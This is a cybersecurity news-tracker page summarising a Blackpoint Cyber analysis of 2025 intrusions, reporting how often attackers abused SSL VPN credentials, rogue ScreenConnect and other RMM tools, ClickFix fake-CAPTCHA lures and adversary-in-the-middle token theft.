CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Increased exploitation of legitimate remote access pathways and trusted tools in 2025 intrusions according to Blackpoint Cyber threat analysis

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A 2026 analysis of 2025 incident response cases by Blackpoint Cyber finds threat actors increasingly leveraging legitimate remote access pathways and trusted administrative tools to establish initial access and maintain persistence. Rather than relying on software vulnerabilities, attackers primarily abused valid credentials, SSL VPN sessions, and remote monitoring and management (RMM) tools such as ScreenConnect to blend into normal operations. In cloud environments, adversaries captured and reused authenticated session tokens following successful multi-factor authentication (MFA) via adversary-in-the-middle phishing, bypassing detection by appearing as legitimate sessions.

Timeline

  1. 01.04.2026 17:05 1 articles · 1h ago

    Legitimate access pathways and trusted tools identified as primary intrusion vectors in 2025 incident analysis

    Analysis of 2025 incident response cases by Blackpoint Cyber highlights that threat actors increasingly gain initial access via legitimate remote access methods, including SSL VPN sessions authenticated with compromised credentials (32.8% of cases) and rogue RMM tools such as ScreenConnect (30.3% of cases). Social engineering campaigns using deceptive prompts accounted for 57.5% of incidents, while adversary-in-the-Middle phishing captured authenticated session tokens post-MFA in approximately 16% of cloud compromises, enabling undetected reuse of legitimate sessions.

    Show sources
    Open in new tab

Information Snippets

  • Remote access pathways and trusted administrative tools were the primary initial access vectors in analyzed intrusions, exceeding exploitation of software vulnerabilities.

    First reported: 01.04.2026 17:05
    1 source, 1 article
    Show sources

  • SSL VPN abuse accounted for 32.8% of identifiable incidents, with threat actors authenticating using compromised credentials to establish seemingly legitimate VPN sessions.

    First reported: 01.04.2026 17:05
    1 source, 1 article
    Show sources

  • RMM tool abuse occurred in 30.3% of identifiable incidents, with ScreenConnect present in over 70% of rogue RMM cases, often indistinguishable from legitimate administrative activity.

    First reported: 01.04.2026 17:05
    1 source, 1 article
    Show sources

  • Fake CAPTCHA and ClickFix-style social engineering campaigns drove 57.5% of all identifiable incidents by tricking users into executing commands via the Windows Run dialog using built-in tools.

    First reported: 01.04.2026 17:05
    1 source, 1 article
    Show sources

  • Adversary-in-the-Middle phishing captured authenticated session tokens post-MFA in approximately 16% of cloud account compromise cases, enabling session reuse without bypassing authentication.

    First reported: 01.04.2026 17:05
    1 source, 1 article
    Show sources

  • Investigated incidents spanned multiple sectors including manufacturing, healthcare, MSPs, financial services, and construction, indicating broad applicability of observed intrusion patterns.

    First reported: 01.04.2026 17:05
    1 source, 1 article
    Show sources